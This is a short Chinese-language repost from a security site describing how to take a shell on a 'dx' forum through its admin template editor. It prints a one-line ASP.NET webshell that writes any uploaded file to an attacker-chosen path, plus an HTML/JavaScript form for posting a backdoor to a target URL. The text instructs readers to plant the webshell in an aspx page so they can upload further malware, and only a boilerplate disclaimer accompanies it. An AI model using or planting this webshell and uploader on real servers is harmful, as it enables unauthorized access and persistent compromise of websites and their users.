.net一句话马以及dx论坛拿shell 's

admin 2017年4月27日17:41:06评论253 views字数 784阅读2分36秒阅读模式
摘要

来源:loveshelldx论坛后台提供编辑模板功能,对于.net分层设计的思想这是个很好的功能,可是这个功能也导致了安全漏洞,可以插入自己的后门(也可以直接目录跳转编辑其他的aspx文件)
<% if(Request.Files.Count > 0) Request.Files[0].SaveAs(Server.MapPath(Request.Form["pass"]));%>

来源:loveshell

dx论坛后台提供编辑模板功能,对于.net分层设计的思想这是个很好的功能,可是这个功能也导致了安全漏洞,可以插入自己的后门(也可以直接目录跳转编辑其他的aspx文件)
<% if(Request.Files.Count > 0) Request.Files[0].SaveAs(Server.MapPath(Request.Form["pass"]));%>

<form enctype="multipart/form-data" action="http://1.com/index.aspx" name="hack" method="POST" onsubmit=doit()>
插的在这里<input name="url" type=text value="http://www.loveshell.net/blog/"/>
<br>
<br>
<input type="hidden" name="MAX_FILE_SIZE" value="30000" />
上传这只后门: <input name="userfile" type="file" />
<br>

<br>
<input name="pass" type=text value="loveshell.aspx"/>
<br>
<input type="submit" value="劳资要传" />
</form>

<script>
function doit(){
document.hack.action=document.hack.url.value;
document.hack.submit();
}
</script>

直接插在aspx页面就可以传马了 呵呵

http://msdn2.microsoft.com/zh-cn/library/

http://chs.gotdotnet.com/quickstart/aspplus/

学习.net的2个好地方

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月27日17:41:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   .net一句话马以及dx论坛拿shell 'shttps://cn-sec.com/archives/47416.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息